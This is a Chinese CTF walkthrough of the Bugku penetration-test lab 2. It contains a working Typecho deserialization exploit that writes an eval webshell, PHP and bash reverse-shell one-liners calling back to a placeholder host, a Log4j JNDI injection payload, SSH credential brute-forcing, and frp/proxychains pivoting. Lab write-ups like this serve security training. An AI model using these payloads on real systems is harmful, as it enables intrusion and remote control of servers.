bugku渗透测试2 WP
bugku渗透测试2 WP
bugku渗透测试1 WP有详细的frp,proxifier配置
https://www.cnblogs.com/thebeastofwar/p/17744965.html
注意这次因为有三次frp代理,所以注意代理命名和端口号要不同(frpc1.ini,frpc2.ini,frpc3.ini样例)
先fscan一段扫,无果
然后nmap扫全端口,无果
之后回到web端查看指纹,发现希望
发现这个有nday漏洞
exp.php
<?php
class Typecho_Feed
{
const RSS1 = 'RSS 1.0';
const RSS2 = 'RSS 2.0';
const ATOM1 = 'ATOM 1.0';
const DATE_RFC822 = 'r';
const DATE_W3CDTF = 'c';
const EOL = "\n";
private $_type;
private $_items;
public function __construct(){
$this->_type = $this::RSS2;
$this->_items[0] = array(
'title' => '1',
'link' => '1',
'date' => 1508895132,
'category' => array(new Typecho_Request()),
'author' => new Typecho_Request(),
);
}
}
class Typecho_Request
{
private $_params = array();
private $_filter = array();
public function __construct(){
$this->_params['screenName'] = 'echo "<?php phpinfo();@eval(\$_POST[1]);?>" > shell.php';
$this->_filter[0] = 'system';
}
}
$exp = array(
'adapter' => new Typecho_Feed(),
'prefix' => 'typecho_'
);
echo base64_encode(serialize($exp));
?>
之后传参
get:http://47.102.44.129/install.php?finish=a
post:
__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjU1OiJlY2hvICI8P3BocCBwaHBpbmZvKCk7QGV2YWwoXCRfUE9TVFsxXSk7Pz4iID4gc2hlbGwucGhwIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6InN5c3RlbSI7fX19czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTU6ImVjaG8gIjw/cGhwIHBocGluZm8oKTtAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiBzaGVsbC5waHAiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9
蚁剑连接
flag1
在根目录下读到flag
没有wget命令
php反弹shell
如果php -r的方法不行的话
php -r '$sock=fsockopen("xxx",6666);system("/bin/bash -i <&3 >&3 2>&3");'
可以把
<?php $sock=fsockopen("xxx",6666);exec("/bin/bash -i <&3 >&3 2>&3");?>
写到一个文件里,然后php x.php
提高shell交互性
python3 -c 'import pty; pty.spawn("/bin/bash")'
flag2
读取到config.inc.php配置文件
生成哥斯拉的shell
利用哥斯拉上传fscan,查看内网网段,扫描
192.168.0.2:3306 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.3:80 open
192.168.0.1:22 open
[*] alive ports len is: 5
start vulscan
[*] WebTitle: http://192.168.0.1 code:200 len:3392 title:Harry's Blog
[*] WebTitle: http://192.168.0.2 code:200 len:3392 title:Harry's Blog
[*] WebTitle: http://192.168.0.3 code:200 len:4789 title:Bugku后台管理系统
[+] mysql:192.168.0.2:3306:root
socks5代理
访问http://192.168.0.3/
目录扫描发现source.zip源码泄露(正规解法应该是burp发现返回包有source.zip字段)
进行简单的代码审计
主要就两个文件
Log4j2CtfApplication.java
package com.example.log4j2ctf;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class Log4j2CtfApplication {
public static void main(String[] args) {
SpringApplication.run(Log4j2CtfApplication.class, args);
}
}
DamnVulnerableLog4j.java
package com.example.log4j2ctf.controller;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;
import javax.servlet.http.HttpServletResponse;
@RestController
public class DamnVulnerableLog4j {
private final Logger logger = LoggerFactory.getLogger(this.getClass());
private int count = 0;
@PostMapping("/login")
public String login(String user, String pwd, HttpServletResponse response) {
response.addHeader("Source", "/source.zip");
/*
*
*
*/
logger.info("用户登录失败,用户名不存在:" + user);
return "用户名或密码错误,次数 " + (count++);
}
}
现在我们需要考虑三个问题:
1.利用哪一个漏洞(log4j,根据文件的名字得出来的,也可以根据文件中的log日志回想起2021的log4j漏洞)
2.知道了是log4j漏洞,利用点在哪里(在输入用户名的地方,因为代码中有logger.info("用户登录失败,用户名不存在:" + user);
,可以拼接log4j的ldap,rmi等相关注入)
3.知道了利用点在哪里,log4j有很多个payload,该用哪一个(springboot的那个,因为pom.xml中有springboot的相关配置,这个应该利用springboot的相关框架,猜测)
然后将JNDI-Injection-Exploit-1.0.jar上传到vps上
bash -i >& /dev/tcp/xxx/6666 0>&1
bash -c {echo,xxx}|{base64,-d}|{bash,-i}
java -jar JNDI-Injection-Exploit-1.0.jar -C "bash -c {echo,xxx}|{base64,-d}|{bash,-i}" -A "xxx"
选择sprintboot
payload:${jndi:rmi://xxx:xxx/xxx}
将payload放在用户名处
然后nc监听
接受到反弹的shell
一上来就是root
flag4
cat /flag
读取到/start.sh
flag5
发现/root/flag也有flag
flag3
全局搜索flag
在环境变量中发现三个flag
ip address发现还有别的网卡
利用wget远程下载fscan,frpc,frpc.ini
扫描192.168.1.0-255
192.168.1.3:80 open
192.168.1.1:80 open
192.168.1.2:80 open
192.168.1.1:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://192.168.1.1 code:200 len:3392 title:Harry's Blog
[*] WebTitle: http://192.168.1.2 code:200 len:4789 title:Bugku后台管理系统
[*] WebTitle: http://192.168.1.3 code:200 len:524 title:乙公司Git仓库
已完成 3/4 [-] ssh 192.168.1.1:22 root P@ssw0rd! ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/4 [-] ssh 192.168.1.1:22 root Aa123123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/4 [-] ssh 192.168.1.1:22 admin admin123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/4 [-] ssh 192.168.1.1:22 admin Aa1234 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 4/4
[*] 扫描结束,耗时: 4m43.657692575s
http://192.168.1.3/
填入https://github.com/bugku/BWVS.git,在点进去的时候找到了flag
flag6
flag7
之后想getshell
猜测输入仓库的话服务器会直接克隆到本地,要是仓库里面有一个webshell的话,会不会直接getshell了
自己创建一个新仓库,配置ssh密钥,关掉keep my email address private,然后先克隆到本地
git clone xxx
git add .
git commit -m "xxx"
git push
自己仓库地址:https://github.com/TheBeastofwar/webshell-repository
getshell后读取到源码
<html>
<head>
<meta charset="utf-8">
<title>乙公司Git仓库</title>
</head>
<body>
<p>乙公司Git仓库</p>
<form method="post">
<label for="repourl">Repository’s clone URL</label><br>
<input id="repourl" type="input" name="repourl" placeholder="https://github.com/bugku/BWVS.git" style="width: 400px;height: 30px;margin-bottom: 10px;margin-top: 10px;"><br/>
<input type="submit" value="Submit" />
</form>
<p>注意:可以使用自己的服务器。</p>
<?php
if (isset($_REQUEST['repourl']) && !empty($_REQUEST['repourl'])) {
$repourl = escapeshellarg($_REQUEST['repourl']);
@chdir("/var/www/html/repos/");
shell_exec("git clone --recursive $repourl");
echo 'See your project at: <a href="/repos">Repos</a>';
}
?>
</body>
</html>
查看网段
上传哥斯拉的shell.phtml
然后利用哥斯拉上传fscan,frpc.frpc.ini
fscan扫描
(icmp) Target 10.10.0.3 is alive
(icmp) Target 10.10.0.2 is alive
(icmp) Target 10.10.0.1 is alive
[*] Icmp alive hosts len is: 3
10.10.0.1:80 open
10.10.0.2:80 open
10.10.0.1:22 open
10.10.0.3:21 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://10.10.0.2 code:200 len:524 title:乙公司Git仓库
[*] WebTitle: http://10.10.0.1 code:200 len:3368 title:Harry's Blog
已完成 2/4 [-] ssh 10.10.0.1:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
开放了21端口
再看一下提示
猜测是ftp服务的用户名和密码 guest/guest
配置proxychains
proxychains ftp 10.10.0.3
flag8
get flag
flag9
cd /
get flag
后续处理
关掉frpc,删掉frpc.ini(里面暴露了自己vps的ip地址)
ps -aux | grep frp > 1.txt
cat 1.txt
kill -9 xxx
遇坑反思:
在反弹shell的中,如果遇到卡的时间长的话按ctrl+c想退出的话会直接退出shell